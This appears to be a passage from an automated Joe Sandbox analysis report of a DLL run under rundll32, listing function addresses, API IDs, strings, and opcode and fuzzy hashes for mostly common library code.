    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: File$ByteCharMultiWide$CloseCreateHandlePointerWrite
    • String ID:
    • API String ID: 2756471129-0
    • Opcode ID: 6b23d0c6e40299690f7a36898869f45c32df837b7ab4a1c95e255d025550afc3
    • Instruction ID: a842e491601e005fd9f2c4575d9b4f2ebb9e15073606ee3205ad19157fa4f769
    • Opcode Fuzzy Hash: 6b23d0c6e40299690f7a36898869f45c32df837b7ab4a1c95e255d025550afc3
    • Instruction Fuzzy Hash: 0021D532618A8282E720DB96F45476EBBB4F7C17A4F600168EA9942AB8DF7DD4458F40
    Function 00007FFE1150F98C Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast$abort
    • String ID:
    • API String ID: 1447195878-0
    • Opcode ID: 8f5f44110bc1d0632d251398e1016294268f9f654d9382c7bde1d867465509cc
    • Instruction ID: 612cf189e6720a16366058fc75473db9d9b86888803d22424f859f678ab5663d
    • Opcode Fuzzy Hash: 8f5f44110bc1d0632d251398e1016294268f9f654d9382c7bde1d867465509cc
    • Instruction Fuzzy Hash: AD018010B09E4283FB4AA3B7655527C116A9F447B4F2409BED91E037F6EE2DF8408202
    Function 00007FFE11507EA0 Relevance: 6.0, APIs: 4, Instructions: 37fileCOMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: File$CloseCreateHandlePointerWrite
    • String ID:
    • API String ID: 3604237281-0
    • Opcode ID: 83807af017437b31c501729392df66d907e5eab3e2636974724a16a37aa36c3d
    • Instruction ID: 7a6ea21e4fa0676e51ea444db867e7b751d2567e0d66e3391fded32e82466f70
    • Opcode Fuzzy Hash: 83807af017437b31c501729392df66d907e5eab3e2636974724a16a37aa36c3d
    • Instruction Fuzzy Hash: 75110A32618E4182E320CB16F45871BB7B5F7C17A4F604228EBE942AB8CF3DD4558F40
    Function 00007FFE1150AEB4 Relevance: 6.0, APIs: 4, Instructions: 17COMMON
    Download Yara Rule
    APIs
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: CriticalInitializeSection__vcrt___vcrt_initialize_locks__vcrt_initialize_ptd__vcrt_initialize_pure_virtual_call_handler__vcrt_uninitialize_locks
    • String ID:
    • API String ID: 1318428292-0
    • Opcode ID: eb2f8f0094a652a8ec3976215d151007980e554bb10d0978fa0b734800c382c4
    • Instruction ID: 24769f847cd4d8036051f19c9caa48ba216ae6e7467ff28259edf338a7673757
    • Opcode Fuzzy Hash: eb2f8f0094a652a8ec3976215d151007980e554bb10d0978fa0b734800c382c4
    • Instruction Fuzzy Hash: 0FD04858C0DE4389FFA47AE315821BC024C2F61374F591AF8E50D122B36E0E2A8A2632
    Function 00007FFE1150BCCC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 169COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID: *
    • API String ID: 3215553584-163128923
    • Opcode ID: 9aa440b12cdd57db820100a022e373787db2dce34c9df4772f73532b9b2b7131
    • Instruction ID: 02078bccb919df24a903c617e56e983c41a8e3bb9d56165188153ece8752e35c
    • Opcode Fuzzy Hash: 9aa440b12cdd57db820100a022e373787db2dce34c9df4772f73532b9b2b7131
    • Instruction Fuzzy Hash: 4771647A918A128AE7648F6680C413C3BA8FB45F68F2411BEDB1A433B4DF3DD881D755
    Function 00007FFE11510020 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: _invalid_parameter_noinfo
    • String ID: e+000$gfff
    • API String ID: 3215553584-3030954782
    • Opcode ID: 1aa317aee98420e886a7189b94bb31c84e6dffec3168e682d301d2b8c5b875d8
    • Instruction ID: 10257fcbfbbea18250dbfd7a3dbfd2a42146e71296347ffc7a7d584b6f6c4592
    • Opcode Fuzzy Hash: 1aa317aee98420e886a7189b94bb31c84e6dffec3168e682d301d2b8c5b875d8
    • Instruction Fuzzy Hash: 53512962B18BC586E7268B369D4136D6B96E781BB0F488275C79C87BF5CE2CD445C700
    Function 00007FFE1150DA1C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: FileModuleName_invalid_parameter_noinfo
    • String ID: C:\Windows\system32\rundll32.exe
    • API String ID: 3307058713-1534550049
    • Opcode ID: 3feaf31e8a8aa5d59469bff8cf8e72b79ff713b6ee1cb256d45e1f3dbf8e3265
    • Instruction ID: 38237914500115603e5da152cf746bbb64a8109ffcda52082d6d028f722a84ff
    • Opcode Fuzzy Hash: 3feaf31e8a8aa5d59469bff8cf8e72b79ff713b6ee1cb256d45e1f3dbf8e3265
    • Instruction Fuzzy Hash: 2C41BD32A08E128AEB15DFA3A8401BC77A9EF44BE4B554079ED0E43B75DF3DE4818700
    Function 00007FFE11510B18 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: FileHandleType
    • String ID: @
    • API String ID: 3000768030-2766056989
    • Opcode ID: 897ff812d347322ec8280039f48a83ce4e88950e5a6bb14fa14df3a3018b8a11
    • Instruction ID: 4d3d1d77434b83d584980217ef4c80594ee82793ce23d64dea0745f9586a6ab3
    • Opcode Fuzzy Hash: 897ff812d347322ec8280039f48a83ce4e88950e5a6bb14fa14df3a3018b8a11
    • Instruction Fuzzy Hash: B9218122B18E4281EB618F2A949013C265AFB45778F280376D6BE067F4CE3CD8C1D341
    Function 00007FFE1150AB6C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: ErrorFileLastModuleName
    • String ID: Main Returned.
    • API String ID: 2776309574-1078862748
    • Opcode ID: 77e881fd6ce4fab5a6620ff27ae76e5444be1c482fb07467e75623395cf61dea
    • Instruction ID: e5083233fe0470ce540cb0ce0a5130b818bcc65384d4cf0a8a5ca52f30ac2d4b
    • Opcode Fuzzy Hash: 77e881fd6ce4fab5a6620ff27ae76e5444be1c482fb07467e75623395cf61dea
    • Instruction Fuzzy Hash: 67215332A18F81C6E750DBA6E8947AA73A8FB84364F401679DA5C466B4EF3CE144CB00
    Function 00007FFE1150AA54 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57COMMON
    Download Yara Rule
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000008.00000002.3509690889.00007FFE11501000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE11500000, based on PE: true
    • Associated: 00000008.00000002.3509603791.00007FFE11500000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509806801.00007FFE11519000.00000002.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3509927061.00007FFE11524000.00000008.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510002189.00007FFE11526000.00000004.00000001.01000000.00000005.sdmpDownload File
    • Associated: 00000008.00000002.3510084649.00007FFE11528000.00000002.00000001.01000000.00000005.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_8_2_7ffe11500000_rundll32.jbxd
    Similarity
    • API ID: ErrorFileLastModuleName
    • String ID: Main Invoked.
    • API String ID: 2776309574-1952101238
    • Opcode ID: 6b15e732082802fbb441b9506356060c202f58fa210ca7ca8373136bb8fae3af
    • Instruction ID: 2f681057e0a41d8b608834072e12c48b7e8af14301d53d5b60c100cecef0929b
    • Opcode Fuzzy Hash: 6b15e732082802fbb441b9506356060c202f58fa210ca7ca8373136bb8fae3af
    • Instruction Fuzzy Hash: 6A216732A18F41C6E760CBA6E8943AA73B8FF44364F500675DA5D466B4EF7CD144CB00